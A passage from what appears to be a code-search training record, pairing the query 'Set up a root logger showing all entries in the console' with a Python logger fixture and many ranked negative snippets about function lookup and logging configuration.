inspect.getfullargspec(func).args\n if args and is_selfish_name(args[0]):\n del args[0]\n return args", "def get_underlying_parameter(self, rel_name):\n return self._declaration[rel_name].underlying_parameter # pytype: disable=bad-return-type", "def get_func(self, class_name, arg, stored_objects):\n find_func = re.match('([a-z]+)', arg) # returns a matching object\n func_name = find_func.group()\n args = re.findall('\"([^\"]+)\",?', arg) # return a list of arguments\n\n if len(args) == 0:\n if func_name == \"all\":\n self.all(class_name, stored_objects)\n elif func_name == \"count\":\n self.count(class_name, stored_objects)\n else:\n print(\"** instance id missing **\")\n\n elif len(args) == 1:\n if self.check_instance(class_name, args[0], stored_objects):\n if func_name == \"show\":\n self.show(class_name, args[0], stored_objects)\n elif func_name == \"destroy\":\n self.destroy(class_name, args[0], stored_objects)\n elif func_name == \"update\":\n print(\"** attribute name missing **\")\n\n elif len(args) == 2 and func_name == \"update\":\n print(\"** value missing **\")\n\n elif len(args) == 3 and func_name == \"update\":\n if self.check_instance(class_name, args[0], stored_objects):\n self.update(class_name, args, stored_objects)", "def convert_type(self, name, type):\n\t\t#\t\tprint 'Called with name = %s and type = %s' %(name, type)\n\t\tname = ''.join(name.split())\n\t\ttype = ''.join(type.split())\n\n\t\tif re.match(r'\\w+', type): #It's a concrete type\n\t\t\treturn self.TYPES_DICT.get(type,type) + ' ' + name\n\n\t\tarrow = type.rfind('->')\n\t\tassert arrow != -1, \"If it's not a primitive, it must be a function\"\n\t\tparams, return_type = type[:arrow], type[arrow+2:]\n\t\tassert params[0] == '(' and params[-1] == ')'\n\t\tparams = params[1:-1]\n\n\t\tparams_tokenized = Lexer(params).get_tokens()\n\t\tparam_list = self.split_params(params_tokenized)\n\t\tcpp_params = map(lambda n: self.convert_type('', n), param_list)\n\t\treturn_type = self.convert_type('', return_type)\n\t\treturn return_type + '(*' + name + ')(' + ','.join(cpp_params) + ')'", "def get_func_by_name(self, name):\n if(name == self.name):\n res = self\n else:\n res = None\n return res", "def funcname(funcstr):\n ps = funcstr.find('(')\n return funcstr[:ps]", "def getFunctionAt(self, entryPoint: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Function:\n ...", "def test_vulkan_func_pointer_with_const_member() -> None:\n\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef VkBool32 (VKAPI_PTR *\n <name>PFN_vkDebugReportCallbackEXT</name>)(\n <type>VkDebugReportFlagsEXT</type> flags,\n <type>VkDebugReportObjectTypeEXT</type> objectType,\n <type>uint64_t</type> object,\n <type>size_t</type> location,\n <type>int32_t</type> messageCode,\n const <type>char</type>* pLayerPrefix,\n const <type>char</type>* pMessage,\n <type>void</type>* pUserData);</type>\n \"\"\"\n\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n argument_names = list(funcptr.arguments.keys())\n assert argument_names[4] == \"messageCode\"\n assert funcptr.arguments[\"pLayerPrefix\"].argument_type == \"const char*\"", "def find_func(self, params):\n match = self.funcs.get(params, self.funcs[(otherwise,)])\n return match", "def get_mapping_function(\n function_name: Text, functions_mapping: FunctionsMapping\n) -> Callable:\n if function_name in functions_mapping:\n return functions_mapping[function_name]\n\n elif function_name in [\"parameterize\", \"P\"]:\n return 
loader.load_csv_file\n\n elif function_name in [\"environ\", \"ENV\"]:\n return utils.get_os_environ\n\n elif function_name in [\"multipart_encoder\", \"multipart_content_type\"]:\n # extension for upload test\n from httprunner.ext import uploader\n\n return getattr(uploader, function_name)\n\n try:\n # check if HttpRunner builtin functions\n built_in_functions = loader.load_builtin_functions()\n return built_in_functions[function_name]\n except KeyError:\n pass\n\n try:\n # check if Python builtin functions\n return getattr(builtins, function_name)\n except AttributeError:\n pass\n\n raise exceptions.FunctionNotFound(f\"{function_name} is not found.\")", "def _get_function(func):\n if isinstance(func, method_types):\n func = func.__func__\n return func", "def function(receiver):\n if hasattr(receiver, IM_FUNC):\n # Instance method.\n im_func = getattr(receiver, IM_FUNC)\n func_code = getattr(im_func, FUNC_CODE)\n return receiver, func_code, True\n elif hasattr(receiver, FUNC_CODE):\n func_code = getattr(receiver, FUNC_CODE)\n return receiver, func_code, False\n elif hasattr(receiver, \"__call__\"):\n return function(receiver.__call__)\n else:\n raise ValueError(f\"unknown reciever type {receiver} {type(receiver)}\")", "def get_pointer(self, name, timeout=None):\r\n exist = self._exist(name)\r\n isobject = self._isobject(name, exist)\r\n\r\n if exist == 0:\r\n raise Oct2PyError('\"%s\" is undefined' % name)\r\n\r\n elif exist == 1:\r\n return _make_variable_ptr_instance(self, name)\r\n\r\n elif isobject:\r\n return self._get_user_class(name)\r\n\r\n elif exist in [2, 3, 5]:\r\n return self._get_function_ptr(name)\r\n\r\n raise Oct2PyError('Unknown type for object \"%s\"' % name)", "def find_functions(code):\n regex = \"^\\s*\" + re_func_decl + \"\\s*{\"\n \n funcs = []\n while True:\n m = re.search(regex, code, re.M)\n if m is None:\n return funcs\n \n rtype, name, args = m.groups()[:3]\n if args == 'void' or args.strip() == '':\n args = []\n else:\n args = [tuple(arg.strip().split(' ')) for arg in args.split(',')]\n funcs.append((name, args, rtype))\n \n code = code[m.end():]", "def is_calldef_pointer(type):\n if not is_pointer(type):\n return False\n nake_type = remove_alias(type)\n nake_type = remove_cv(nake_type)\n return isinstance(nake_type, cpptypes.compound_t) \\\n and isinstance(nake_type.base, cpptypes.calldef_type_t)", "def callBigDlFunc(bigdl_type, name, *args):\n gateway = _get_gateway()\n args = [_py2java(gateway, a) for a in args]\n error = Exception(\"Cannot find function: %s\" % name)\n for jinvoker in JavaCreator.instance(bigdl_type, gateway).value:\n # hasattr(jinvoker, name) always return true here,\n # so you need to invoke the method to check if it exist or not\n try:\n api = getattr(jinvoker, name)\n result = callJavaFunc(api, *args)\n except Exception as e:\n error = e\n # if the invoked method exist but something else went wrong, throw the exception\n if not re.match(r'.*Method.*does not exist', str(e), flags=re.DOTALL):\n invalidOperationError(False, str(e), cause=e)\n else:\n return result\n invalidOperationError(False, \"Cannot find function: %s\" % name, cause=error)", "def argument_type(arg):\n types = (int, float)\n \n for t in types:\n try:\n return type(t(arg))\n except ValueError:\n continue\n \n return str", "def getargspec(func):\r\n\r\n if ismethod(func):\r\n func = func.im_func\r\n if not isfunction(func):\r\n raise TypeError('{!r} is not a Python function'.format(func))\r\n args, varargs, varkw = getargs(func.func_code)\r\n return ArgSpec(args, 
varargs, varkw, func.func_defaults)", "def acfunct(arg):\n try:\n functions = [dynet.rectify, dynet.tanh]\n functions = { function.__name__ : function for function in functions}\n functions[\"None\"] = None\n return functions[str(arg)]\n except:\n raise argparse.ArgumentTypeError(\"String {} does not match required format\".format(arg,))", "def get_type(*args):\n return _ida_hexrays.get_type(*args)", "def extern(fn):\n return builtin(fn)", "def _lex_type_lookup_func(self, name):\n is_type = self._is_type_in_scope(name)", "def _load_from_callable(name, kwds, converters={}):\n # See if we actually have the named object.\n dotted_name = kwds.pop(name, None)\n if dotted_name is None:\n return None\n obj = resolveDotted(dotted_name)\n # Extract any arguments for the callable.\n obj_kwds = {}\n prefix = name + \"_\"\n for key in kwds.keys():\n if key.startswith(prefix):\n obj_kwds[key[len(prefix):]] = kwds.pop(key)\n # To any type conversion on the arguments.\n for key, value in obj_kwds.iteritems():\n converter = converters.get(key)\n if converter is not None:\n obj_kwds[key] = converter(value)\n # Call it if callable.\n if callable(obj):\n obj = obj(**obj_kwds)\n elif obj_kwds:\n raise ValueError(\"arguments provided for non-callable %r\" % (name,))\n return obj", "def get_function_name_at(self, address):\n pass", "def _get_type(func, name, doc, hints):\n doc_type = doc.params.get(name, _Param(None, None)).type\n if doc_type is not None:\n doc_type = _get_type_from_doc(doc_type, func.__globals__)\n\n try:\n hint = hints[name]\n except KeyError:\n hint_type = None\n else:\n hint_type = _get_type_from_hint(hint)\n\n chosen = [x is not None for x in [doc_type, hint_type]]\n if not any(chosen):\n raise ValueError('no type found for parameter {}'.format(name))\n if all(chosen) and doc_type != hint_type:\n raise ValueError('conflicting types found for parameter {}: {}, {}'\n .format(name, doc.params[name].type, hint.__name__))\n return doc_type or hint_type", "def load_function(library, function_name,\n module_type=MODULE_TYPE_EXECUTE_SIMPLE):\n function = getattr(library, function_name, None)\n if not function:\n function = getattr(library, function_name + \"_\", None)\n\n if function:\n if module_type == MODULE_TYPE_EXECUTE_SIMPLE:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_int\n elif module_type == MODULE_TYPE_EXECUTE_CONFIG:\n function.argtypes = [ctypes.c_voidp, ctypes.c_voidp]\n function.restype = ctypes.c_int\n elif module_type == MODULE_TYPE_SETUP:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_voidp\n elif module_type == MODULE_TYPE_CLEANUP:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_int\n else:\n raise ValueError(\"Unknown module type passed to load_interface\")\n return function", "def extract_functions(elf_path):\n text_data = objdump_section(elf_path, '.text')\n name_to_addr = parse_func_names(text_data)\n return name_to_addr" ]
[ "0.66590554", "0.61740726", "0.61581415", "0.59001285", "0.5855032", "0.58468574", "0.5705164", "0.5677757", "0.5639868", "0.5615557", "0.5614763", "0.56135756", "0.5601841", "0.55988264", "0.5483516", "0.54684794", "0.5429972", "0.53992546", "0.53571665", "0.53392667", "0.53380996", "0.53260463", "0.53191066", "0.5304652", "0.5283336", "0.5265893", "0.5257242", "0.52564317", "0.5245141", "0.5237741", "0.52364755", "0.52337265", "0.523", "0.5222681", "0.5208236", "0.519406", "0.518955", "0.5184311", "0.5183014", "0.5174977", "0.5171404", "0.515855", "0.51580954", "0.51535106", "0.51291907", "0.5129172", "0.5089508", "0.50710523", "0.50697297", "0.5062785", "0.50577176", "0.5041915", "0.5037386", "0.5029763", "0.50216156", "0.50202227", "0.5019348", "0.50179297", "0.50141317", "0.50045395", "0.5004136", "0.49813733", "0.4968316", "0.49348086", "0.4930512", "0.49287096", "0.49286622", "0.49242422", "0.49242422", "0.49228743", "0.49187925", "0.48779663", "0.4875087", "0.48710608", "0.48666197", "0.48648745", "0.4860335", "0.48560968", "0.48549578", "0.48542655", "0.48370093", "0.48335794", "0.4830539", "0.48044807", "0.47957212", "0.4794228", "0.4790055", "0.47864643", "0.4774613", "0.47733328", "0.47707608", "0.47704327", "0.47689268", "0.4764447", "0.4762821", "0.4759284", "0.47576442", "0.47402817", "0.47399184", "0.47346908" ]
0.6079239
3
Set up a root logger showing all entries in the console.
def logger(request):
    log = logging.getLogger()
    hdlr = logging.StreamHandler()
    fmt = '%(asctime)s %(name)s %(levelname)s %(message)s'
    formatter = logging.Formatter(fmt)
    hdlr.setFormatter(formatter)
    log.addHandler(hdlr)
    log.setLevel(logging.DEBUG)
    log.propagate = False
    return log
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup_logger():\n root = logging.getLogger()\n root.setLevel(LOGGING_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(LOGGING_LEVEL)\n ch.setFormatter(formatter)\n root.addHandler(ch)", "def setup_logging():\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console = logging.StreamHandler(sys.stdout)\n console.setLevel(logging.DEBUG)\n console.setFormatter(formatter)\n root = logging.getLogger()\n root.addHandler(console)\n root.setLevel(logging.DEBUG)", "def _setup_logger():\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n log_handle = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\n \"[%(levelname)s] (%(asctime)s) - %(message)s\", datefmt=\"%Y-%m-%d %H:%M:%S\"\n )\n log_handle.setFormatter(formatter)\n root.addHandler(log_handle)\n\n logging.info(\"Initializing snakes\")", "def configure_logging(self):\n\n root_logger = logging.getLogger('')\n root_logger.setLevel(logging.DEBUG)\n\n console = logging.StreamHandler()\n console_level = self.LOG_LEVEL_MAP.get(self.options.verbose_level,\n logging.WARNING)\n console.setLevel(console_level)\n formatter = logging.Formatter(config.DEFAULT_MESSAGE_FORMAT)\n console.setFormatter(formatter)\n root_logger.addHandler(console)", "def initialize_logger(self):\n\n # initialize logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # logger console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter(\"\"))\n logger.addHandler(console_handler)", "def configure_logging(self):\r\n root_logger = logging.getLogger('')\r\n\r\n # Set up logging to a file\r\n root_logger.setLevel(logging.DEBUG)\r\n\r\n # Send higher-level messages to the console via stderr\r\n console = logging.StreamHandler(self.stderr)\r\n console_level = {self.WARNING_LEVEL: logging.WARNING,\r\n self.INFO_LEVEL: logging.INFO,\r\n self.DEBUG_LEVEL: logging.DEBUG,\r\n }.get(self.options.verbose_level, logging.DEBUG)\r\n console.setLevel(console_level)\r\n if logging.DEBUG == console_level:\r\n formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)\r\n else:\r\n formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)\r\n console.setFormatter(formatter)\r\n root_logger.addHandler(console)\r\n return", "def _begin_logging(self):\n logconf.set_up_root_logger(self.opts.logfile)", "def initialize_logging():\n\n print 'Setting up logging...'\n\n log_level = app.config['LOGGING_LEVEL']\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def init_logs(self):\n\n handler = logging.FileHandler(self.app.config['LOG'])\n handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))\n self.app.logger.addHandler(handler)\n if self.app.config.get(\"LOG_LEVEL\") == \"DEBUG\":\n 
self.app.logger.setLevel(logging.DEBUG)\n elif self.app.config.get(\"LOG_LEVEL\") == \"WARN\":\n self.app.logger.setLevel(logging.WARN)\n else:\n self.app.logger.setLevel(logging.INFO)\n self.app.logger.info('Startup with log: %s' % self.app.config['LOG'])", "def configure_logging():\n # console_handler = TTSHandler()\n root = logging.getLogger('node_' + __name__)\n root.setLevel(logging.INFO)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console_handler.setFormatter(formatter)\n root.addHandler(console_handler)\n\n root = logging.getLogger()\n root.addHandler(console_handler)\n # the default formatter just returns the message\n root.setLevel(logging.DEBUG)", "def log_setup(self):\n # Logger initialisation\n logger = logging.getLogger(self.app_name)\n logger.setLevel(logging.DEBUG)\n\n # Creating console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # Creating formatter\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n\n # Adding formatter to ch\n ch.setFormatter(formatter)\n\n # Adding ch to logger\n logger.addHandler(ch)\n\n # Setting the Logger Level (INFO)\n logger.setLevel(logging.INFO)\n\n return logger", "def configure_logging(self):\n root_logger = logging.getLogger('')\n\n # Set up logging to a file\n root_logger.setLevel(logging.DEBUG)\n\n # Send higher-level messages to the console via stderr\n console = logging.StreamHandler(self.stderr)\n console_level = {self.WARNING_LEVEL: logging.WARNING,\n self.INFO_LEVEL: logging.INFO,\n self.DEBUG_LEVEL: logging.DEBUG,\n }.get(self.options.verbose_level, logging.DEBUG)\n # The default log level is INFO, in this situation, set the\n # log level of the console to WARNING, to avoid displaying\n # useless messages. 
This equals using \"--quiet\"\n if console_level == logging.INFO:\n console.setLevel(logging.WARNING)\n else:\n console.setLevel(console_level)\n if logging.DEBUG == console_level:\n formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)\n else:\n formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)\n logging.getLogger('iso8601.iso8601').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n console.setFormatter(formatter)\n root_logger.addHandler(console)\n return", "def initLogging(self):\n logging.basicConfig(level=self.loglevel, stream=sys.stderr)", "def configure_console_logger ():\n\t\tconsole = logging.StreamHandler()\n\t\tconsole.setLevel(logging.INFO) # Change level for console logger in development mode\n\t\tformatter = logging.Formatter('%(levelname)-8s %(message)s')\n\t\tconsole.setFormatter(formatter)\n\t\tlogging.getLogger('').addHandler(console)", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def setup_logging():\n logger = logging.getLogger()\n logger.level = logging.DEBUG\n stream_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(stream_handler)", "def init_logger():\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(f'[%(asctime)s] %(name)s level=%(levelname)s %(filename)s:%(lineno)d \"%(message)s\"')\n handler = logging.StreamHandler()\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n root_logger.addHandler(handler)\n\n # Silencing the noisy Kafka logger\n kafka_logger = logging.getLogger('kafka')\n kafka_logger.setLevel(logging.ERROR)", "def setup_logging(self):\n console_handler = logging.StreamHandler()\n request_logging.assign_request_filter(console_handler,\n self.additional_fields)\n logging.basicConfig(level=self.level,\n format=self.format_string,\n handlers=[console_handler])\n for handler in logging.root.handlers:\n handler.setFormatter(RedactionFormatter(handler.formatter))\n logger = logging.getLogger(__name__)\n logger.info('Established logging defaults')\n self._setup_log_levels()", "def configure(cls):\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger", "def initialize_root_logger(log_level=INFO):\n formatter = Formatter(LOGGING_FORMAT)\n\n console_handler = StreamHandler()\n console_handler.setFormatter(formatter)\n\n root_logger = getLogger(__name__)\n root_logger.setLevel(log_level)\n root_logger.addHandler(console_handler)\n\n return root_logger", "def setup_logger():\n mc_logger = logging.getLogger('chess_logger')\n mc_logger.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',\n 
datefmt='%Y-%m-%d %H:%M:%S')\n console_handler.setFormatter(formatter)\n mc_logger.addHandler(console_handler)", "def init() -> None:\n log_format = logging.Formatter(\"%(levelname)s || %(name)s || %(asctime)s || %(message)s\")\n\n log_file = Path(\"logs\", \"rl_snake.log\")\n log_file.parent.mkdir(exist_ok=True)\n\n file_handler = handlers.RotatingFileHandler(\n log_file,\n maxBytes=3000000,\n backupCount=5\n )\n file_handler.setFormatter(log_format)\n\n root_logger = logging.getLogger()\n root_logger.addHandler(file_handler)\n root_logger.setLevel(logging.DEBUG if constants.Misc.debug else logging.INFO)\n\n root_logger.info(\"Root logger initilised\")", "def setup_class(cls):\n if os.path.exists(logfilename):\n os.remove(logfilename)\n log = logutils.get_logger(__name__)\n log.root.handlers = []\n logutils.config(mode='standard', console_lvl='stdinfo',\n file_name=logfilename)", "def configure_logger():\n logger = logging.getLogger()\n handler = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)", "def setup_logging():\n logging.basicConfig(format='%(levelname)s: %(message)s', level=LOGLEVEL)", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print 'Setting up logging...'\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def init_logging():\n\n logger = logging.getLogger()\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)", "def _setup_default_logger(self):\n #print(f\"setup default logger is called by {self}\")\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter(\n '%(process)d-%(levelname)s-%(asctime)s.%(msecs)02d-%(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S'))\n self.logger.addHandler(stream_handler)\n self.logger.propagate = True # don't propagate to the root logger! 
", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print('Setting up logging...')\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.info('Logging handler established')", "def initialize_logging(log_level=logging.INFO):\n if not app.debug:\n print('Setting up logging...')\n\n # Set up default logging for submodules to use STDOUT\n # datefmt='%m/%d/%Y %I:%M:%S %p'\n fmt = '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'\n logging.basicConfig(stream=sys.stdout, level=log_level, format=fmt)\n\n # Make a new log handler that uses STDOUT\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(fmt))\n handler.setLevel(log_level)\n\n # Remove the Flask default handlers and use our own\n handler_list = list(app.logger.handlers)\n for log_handler in handler_list:\n app.logger.removeHandler(log_handler)\n app.logger.addHandler(handler)\n app.logger.setLevel(log_level)\n app.logger.propagate = False\n app.logger.info('Logging handler established')", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def _setup_logging(self):\n if self.app_config_has(\"logging\"):\n log_config = self.app_config()[\"logging\"]\n filename_list = [\n v['filename'] for k, v in\n _find_config_tree(log_config, \"filename\")\n ]\n # pre-create directory in advance for all loggers\n for file in filename_list:\n file_dir = os.path.dirname(file)\n if file_dir and not os.path.isdir(file_dir):\n os.makedirs(file_dir, exist_ok=True)\n dictConfig(log_config)\n else:\n log = getLogger()\n handler = StreamHandler()\n formatter = Formatter(\n \"%(asctime)s-%(threadName)s-%(name)s-%(levelname)s-%(message)s\"\n )\n handler.setFormatter(formatter)\n log.addHandler(handler)\n log.setLevel(DEBUG)\n msg = (\"Starting \" + os.path.basename(__name__) +\n \" version \" + __version__ + \" on \" +\n \"_\".join(uname()).replace(\" \", \"_\"))\n logger = getLogger(__name__)\n logger.debug(msg)", "def setup():\n config['global']['log.access_file'] = ''\n config['global']['log.error_file'] = ''\n config['global']['log.screen'] = False\n log_level = getattr(logging, config.log_level)\n logging.root.setLevel(logging.NOTSET)\n file_log.setLevel(log_level)\n logging.root.addHandler(file_log)\n if config.log_screen:\n console_log.setLevel(log_level)\n logging.root.addHandler(console_log)", "def init_logs() -> None:\n logging.basicConfig(\n 
filename=\"logs.txt\",\n filemode=\"w\",\n format=\"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\",\n level=logging.ERROR,\n )\n\n formatter = logging.Formatter(\n \"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\"\n )\n\n global logger\n logger = logging.getLogger(__name__)\n\n # simlogger = logging.getLogger(\"netsquid\")\n # simlogger.setLevel(logging.DEBUG)\n # fhandler = logging.FileHandler(\"simlogs.txt\", mode=\"w\")\n # fhandler.setFormatter(formatter)\n # simlogger.addHandler(fhandler)\n\n # shandler = logging.StreamHandler(stream=sys.stdout)\n # shandler.setLevel(logging.ERROR)\n # shandler.setFormatter(formatter)\n # simlogger.addHandler(shandler)", "def initLogger(self):\n loglevel = self.loglevels[self.loglevel]\n log_format = '%(asctime)s name=%(name)s loglevel=%(levelname)s message=%(message)s'\n logging.basicConfig(format=log_format,\n level=loglevel)\n \tmultiprocessing.log_to_stderr(loglevel)", "def setup_logging(options):\n root_logger = logging.getLogger()\n add_stdout = False\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)-5.5s %(message)s\")\n\n # Write out to a logfile\n if options.logfile:\n handler = logging.FileHandler(options.logfile, mode=\"w\")\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n root_logger.addHandler(handler)\n else:\n # The logfile wasn't specified. Add a stdout logger.\n add_stdout = True\n\n if options.verbose:\n # Add a stdout logger as well in verbose mode\n root_logger.setLevel(logging.DEBUG)\n add_stdout = True\n else:\n root_logger.setLevel(logging.INFO)\n\n if add_stdout:\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n root_logger.addHandler(stdout_handler)", "def setup_logging():\n formatter = logging.Formatter(LOG_FORMAT)\n level = logging.INFO\n\n file_handler = logging.FileHandler('db.log')\n file_handler.setFormatter(formatter)\n file_handler.setLevel(level)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n console_handler.setLevel(level)\n\n logger = logging.getLogger()\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n logger.setLevel(level)", "def setup_logging():\n product_name = \"plasma\"\n logging.setup(cfg.CONF, product_name)\n LOG.info(\"Logging enabled!\")\n LOG.debug(\"command line: %s\", \" \".join(sys.argv))", "def _instanciate_logger(self):\n\t\tself._logger = logging.getLogger('main')\n\t\tself._logger.setLevel(logging.DEBUG)\n\t\tself._logger.addHandler(logging.StreamHandler())", "def initialize_log():\n logging.basicConfig(\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S',\n )", "def setup_logging():\n log.setup('keystone')", "def test_root_logger_config(self):\n with debug_env:\n logging.config.dictConfig(django12factor.factorise()[\"LOGGING\"])\n self.assertTrue(has_handler(logging.root, \"stdout\"))", "def setup_logging():\n lvl = os.getenv(\"LOG_LEVEL\")\n path = os.getenv(\"LOG_PATH\")\n\n logger = get_logger()\n logger.setLevel(lvl)\n\n filehandler = logging.FileHandler(path)\n filehandler.setLevel(lvl)\n filehandler.setFormatter(logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s\",\n datefmt=\"%Y-%d-%m %H:%M:%S\"\n ))\n\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(lvl)\n streamhandler.setFormatter(logging.Formatter(\"%(message)s\"))\n\n logger.addHandler(filehandler)\n logger.addHandler(streamhandler)", "def 
setup_logging():\n\n coloredlogs.install(\n level=DEBUG, fmt=\"%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s\"\n )", "def setup_logging():\n if not app.debug:\n if app.config.get('LOG_CFG'):\n # initialize the Flask logger (removes all handlers)\n _ = app.logger\n dictConfig(app.config.get('LOG_CFG'))\n else:\n # capability with previous config settings\n # Should have LOG_FILE and LOG_LEVEL set\n if app.config.get('LOG_FILE') is not None:\n handler = RotatingFileHandler(app.config.get('LOG_FILE'), maxBytes=10000000, backupCount=100)\n else:\n handler = StreamHandler(stream=sys.stderr)\n\n handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(app.config.get('LOG_LEVEL', DEBUG))\n app.logger.addHandler(handler)", "def loggerSetup(logLevel=logging.INFO):\n logger = logging.getLogger(__name__)\n outHandler = logging.StreamHandler(sys.stdout)\n outHandler.setFormatter(logging.Formatter(\"%(asctime)s:%(levelname)s:%(module)s: %(message)s\"))\n outHandler.setLevel(logLevel)\n logger.addHandler(outHandler)\n logger.setLevel(logLevel)\n return logger", "def _setup_logging():\n logging.Formatter.converter = time.gmtime\n logging.basicConfig(\n format='%(asctime)s %(message)s',\n level=logging.DEBUG,\n filename='conduit-proxy.log')\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n 